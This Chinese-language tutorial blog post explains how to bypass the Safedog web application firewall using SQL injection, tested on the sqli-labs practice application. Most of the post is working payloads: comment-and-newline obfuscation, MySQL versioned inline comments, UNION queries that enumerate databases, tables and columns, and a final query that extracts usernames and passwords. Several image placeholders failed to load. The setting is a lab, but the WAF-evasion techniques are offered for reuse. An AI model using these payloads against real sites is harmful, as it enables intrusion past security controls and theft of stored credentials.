Bypass安全狗

2024-02-23 04:58

文章标签 安全 bypass

本文主要是介绍Bypass安全狗，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

0x00 手工fuzz绕过安全狗

环境

安全狗最新ApacheV4.0版(Windows)
在这里插入图片描述
Sqli-lab-Less-1

Phpstudy集成环境：Apache2.4.39、Mysql5.5.29

在这里插入图片描述

Sqli-lab-Less-1中包含了联合查询、报错注入、布尔盲注、时间延时盲注等注入姿势，方便我们进行测试。

1、fuzz安全狗拦截策略

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1'   报错且不拦截
http://192.168.174.136/sqli-labs-master/sqli--master/Less-1/?id=1' and '1'='1 --+   拦截
http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=1' and  不拦截，所以判断and后接数字则触发规则

在这里插入图片描述

通过burp加载字典对其进行fuzz，发现/*/%0a*a*/未触发规则
该处采用换行加注释进行绕过，其中/**/为mysql注释符，将中间内容注释不执行

在这里插入图片描述
通过and ’1‘=‘1判断页面返回正常，并未触发安全狗

通过and ’1‘=‘2判断页面返回不同，确定为字符型注入

2、查询字段数

1'order/*/%0a*a*/by 3%23  不报错
1'order/*/%0a*a*/by 4%23  报错则判断当前字段为3列

正常payload被拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ovvCaGZA-1631090852631)(编写tamper学习-过狗.assets/image-20210908095928241.png)]

使用上面payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Z31WKrmP-1631090852632)(编写tamper学习-过狗.assets/image-20210908095758501.png)]

3、联合查询

使用上面payload发现被安全狗拦截

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KQUGFm6X-1631090852633)(编写tamper学习-过狗.assets/image-20210908100226083.png)]

多次尝试发现在其再次加入注释即可绕过

此处使用/*!88888www.safedog.dog*/即可绕过，在mysql中存在特性，/*!*/中的数字大于当前数据库版本号则不执行，反之则执行，这个特性常常用于过waf，另外注释中的数字常常为五位数。
最终payload为 ：
-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,3/**/%23
显示位为Your Login name和Your Password

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JtcE83yt-1631090852634)(编写tamper学习-过狗.assets/image-20210908101619776.png)]

4、查询当前库名

先利用以上payload进行测试

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database()/**/%23

多次测试发现拦截字段database()

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oyngfEfW-1631090852635)(编写tamper学习-过狗.assets/image-20210908110617644.png)]

在database和()中间加入之前payload即可绕过

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lQMoM5Rx-1631090852636)(编写tamper学习-过狗.assets/image-20210908144633628.png)]

最终的payload为

-1'union/*/%0a*a*//*!88888www.safedog.dog*/ select 1,2,database/*/%0a*a*/()%23

5、查询所有数据库名称

同样利用以上payload尝试发现安全狗对from和information_schema.schemata进行拦截，再次通过字典对其fuzz，首先对from进行fuzz，使其不触发规则即可

 from可以使用注释加换行可以绕过/*! --+/*123%0a%0a from对于information_schema.schemata，将其字段通过内联注释混淆即可最终语句为
-1' union/*/%0a*a*//*!88888www.safedog.dog*/select/**/1,2,(select/**//*!88888www.safedog.dog*/group_concat(schema_name) from/*!--+/*%0a information_schema./*!schemata*/)%23

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MW65sh8v-1631090852637)(编写tamper学习-过狗.assets/image-20210908105314773.png)]

通过fuzz方式发现下列语句也可绕过

-1' union/*//--/*//*!--+/*%0aselect/*//--/*//*!--+/*%0a1,2,(select/*//--/*//*!--+/*%0agroup_concat(schema_name) from/*//--/*//*!--+/*%0a information_schema./*!schemata*/)%23
主要绕过字段为/*//--/*//*!--+/*%0a

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yjmd8yjo-1631090852638)(编写tamper学习-过狗.assets/image-20210908110402546.png)]

6、获取表名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kqJmeG4y-1631090852639)(编写tamper学习-过狗.assets/image-20210908154221936.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1%27%20union/*/%0a*a*//*!88888www.safedog.dog*/%20select%201,2,(select%20group_concat(table_name)%20/*!%20--+/*123%0a%0afrom%20information_schema./*!tables*/ where table_schema='security')%23

7、获取字段名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A5zAiVSr-1631090852641)(编写tamper学习-过狗.assets/image-20210908155127598.png)]

    http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/select /*/%0a*a*//*!88888www.safedog.dog*/1,2,group_concat(column_name)    from /*!--+/*%0ainformation_schema./*!columns*/ where table_name='users' --+

8、获取数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xi3YLDYD-1631090852644)(编写tamper学习-过狗.assets/image-20210908160357758.png)]

http://192.168.174.136/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union /*/%0a*a*//*!88888www.safedog.dog*/ select 1,2, group_concat(concat_ws(0x7e,username, password))    from   security.users --+

参考文章：https://blog.csdn.net/weixin_54648419/article/details/117285917

这篇关于Bypass安全狗的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！